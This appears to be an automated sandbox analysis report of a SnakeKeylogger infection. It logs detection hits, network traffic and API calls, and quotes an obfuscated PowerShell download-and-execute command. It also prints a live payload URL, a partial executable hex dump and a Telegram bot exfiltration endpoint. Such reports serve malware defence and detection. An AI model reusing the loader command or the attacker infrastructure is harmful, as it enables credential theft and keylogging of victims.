Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_0021F3F3
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_002137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_002137EF
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00213B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00213B12
Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 6_2_0021BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 04705782h 7_2_04705367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 047051B9h 7_2_04704F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 04705782h 7_2_047056AF

Networking

Source: Network traffic | Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 23.95.235.28:80 -> 192.168.2.4:49724
Source: Network traffic | Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 23.95.235.28:80 -> 192.168.2.4:49724
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Mar 2025 00:19:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 13 Mar 2025 12:29:25 GMTETag: "ef800-6303878f4d6d6"Accept-Ranges: bytesContent-Length: 980992Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 cf d2 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 16 06 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0f 00 00 04 00 00 b6 19 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 00 6f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 
00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 6f 02 00 00 70 0c 00 00 70 02 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 e0 0e 00 00 72 00 00 00 86 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 23.95.235.28
Source: Joe Sandbox View | IP Address: 104.21.96.1
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49725 -> 193.122.130.0:80
Source: global traffic | HTTP traffic detected: GET /110/csoss.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 23.95.235.28 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49726 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 23.95.235.28 (this entry is repeated 50 times)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04767A18 URLDownloadToFileW
                    Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /110/csoss.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 23.95.235.28 | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                    Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: powershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://23.95.235.28/110/csoss.ex
                    Source: powershell.exe, 00000003.00000002.1394587679.00000000050BD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://23.95.235.28/110/csoss.exe
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.95.235.28/110/csoss.exe$
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://23.95.235.28/110/csoss.exev
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com0nu
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.comd
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.000000000224E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.00000000021E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/d
                    Source: csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.orgd
                    Source: powershell.exe, 00000003.00000002.1398726052.0000000007300000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
                    Source: powershell.exe, 00000003.00000002.1400465631.0000000008313000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.000000000227D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.000000000227D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.orgd
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.00000000021E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004C01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1394587679.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1393474414.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1393474414.0000000002D26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5
                    Source: powershell.exe, 00000003.00000002.1398906422.00000000073A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/
                    Source: powershell.exe, 00000003.00000002.1396789468.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                    Source: csoss.exe, 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                    Source: RegSvcs.exe, 00000007.00000002.2506031760.0000000002260000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                    Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00224164 OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, _wcscpy, GlobalUnlock, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00223F66 OpenClipboard, IsClipboardFormatAvailable, IsClipboardFormatAvailable, GetClipboardData, CloseClipboard, GlobalLock, CloseClipboard, GlobalUnlock, IsClipboardFormatAvailable, GetClipboardData, GlobalLock, GlobalUnlock, IsClipboardFormatAvailable, GetClipboardData, GlobalLock, DragQueryFileW, DragQueryFileW, DragQueryFileW, GlobalUnlock, CountClipboardFormats, CloseClipboard
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021001C GetKeyboardState, SetKeyboardState, GetAsyncKeyState, GetAsyncKeyState, GetKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0023CABC DefDlgProcW, SendMessageW, GetWindowLongW, SendMessageW, SendMessageW, _wcsncpy, GetKeyState, GetKeyState, GetKeyState, SendMessageW, GetKeyState, SendMessageW, SendMessageW, SendMessageW, ImageList_SetDragCursorImage, ImageList_BeginDrag, SetCapture, ClientToScreen, ImageList_DragEnter, InvalidateRect, ReleaseCapture, GetCursorPos, ScreenToClient, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, GetCursorPos, ScreenToClient, GetParent, SendMessageW, SendMessageW, ClientToScreen, TrackPopupMenuEx, SendMessageW, SendMessageW, ClientToScreen, TrackPopupMenuEx, GetWindowLongW

                    System Summary

                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'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'+[char]34+'))')))"
                    Source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: This is a third-party compiled AutoIt script. 6_2_001B3B3A
                    Source: csoss.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: csoss.exe, 00000006.00000002.1392686190.0000000000264000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_731e3346-5
                    Source: csoss.exe, 00000006.00000002.1392686190.0000000000264000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_8e27c9be-c
                    Source: csoss.exe.3.dr | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_cc3299f9-7
                    Source: csoss.exe.3.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_66d7bdb0-9
                    Source: csoss[1].exe.3.dr | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_4b1481d3-b
                    Source: csoss[1].exe.3.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b02d6f2c-6
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\csoss.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_0021A1EF: GetFullPathNameW, __swprintf, CreateDirectoryW, CreateFileW, _memset, _wcsncpy, DeviceIoControl, CloseHandle, RemoveDirectoryW, CloseHandle
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_00208310 _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: 6_2_002151BD ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: String function: 001B7DE1 appears 35 times
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: String function: 001D8900 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\csoss.exe | Code function: String function: 001D0AE3 appears 70 times
                    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
                    Source: 7.2.RegSvcs.exe.430000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 (date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/)
                    Source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
                    Source: 6.2.csoss.exe.2410000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 (date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/)
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
                    Source: 6.2.csoss.exe.2410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 (date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/)
                    Source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
                    Source: 00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 (date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/)
                    Source: 00000007.00000002.2504028949.0000000000432000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
                    Source: Process Memory Space: csoss.exe PID: 2576, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
                    Source: Process Memory Space: RegSvcs.exe PID: 5304, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
